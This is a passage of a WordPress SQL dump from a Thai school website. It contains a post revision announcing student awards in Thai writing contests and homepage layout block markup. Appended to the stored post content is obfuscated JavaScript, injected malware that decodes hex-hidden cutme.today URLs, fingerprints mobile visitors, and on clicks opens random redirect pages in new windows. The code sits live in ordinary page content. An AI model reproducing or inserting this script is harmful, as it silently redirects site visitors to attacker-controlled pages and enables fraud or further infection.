64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','โรงเรียนอนุบาลวัดพระโต ขอแสดงความยินดีกับนักเรียนคนเก่ง เด็กหญิงชญานิศ ครัวกระโทก ได้รับรางวัลชนะเลิศ กิจกรรมการคัดลายมือ ชั้นป.๑-๓ เด็กหญิงนงนภัส สังขาว ได้รับรางวัลชนะเลิศ กิจกรรมการเขียนเรียงความ ชั้นป.๔-๖ โครงการรักษ์ภาษาไทย ระดับเขตพื้นที่การศึกษา เนื่องในสัปดาห์วันภาษาไทยแห่งชาติ ปี ๒๕๖๗ ครูผู้ฝึกสอน คุณครูเกษมณี เมตตามนุษย์ คุณครูชัญญาภรณ์ ถนอมทรัพย์','','inherit','closed','closed','','189-revision-v1','','','2024-08-15 11:12:24','2024-08-15 04:12:24','',189,'http://watprato.ssk.in.th/?p=194',0,'revision','',0);
INSERT INTO `wp_posts` VALUES
(197,2,'2024-08-23 10:08:57','2024-08-23 03:08:57','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_93202e-5b\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_e4ac7a-c6\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_e4ac7a-c6\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_987966-10\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_987966-10\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_7bc053-2c\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_3a11d0-a6\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_3a11d0-a6 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_138813-93\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_138813-93\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_9f83a7-ce\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_9f83a7-ce\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ประวัติโรงเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_7fabbb-99\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_7fabbb-99\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_1d2215-71\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_1d2215-71\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_7e7dd7-10\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_7e7dd7-10\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลผู้บริหาร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_3078a3-3c\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3078a3-3c\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลบุคลากร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_dadb4c-b7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_dadb4c-b7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลนักเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_24abce-04\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_24abce-04\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูล O-NET</span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://www.facebook.com/profile.php?id=61556083436494&amp;sk=videos\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong>ข้อมูลผู้บริหาร</strong></td></tr><tr><td><strong>อำนาจหน้าที่</strong></td></tr><tr><td><strong>ข้อมูลการติดต่อ</strong></td></tr><tr><td><strong>ข่าวประชาสัมพันธ์</strong></td></tr><tr><td><strong>Q&amp;A</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" 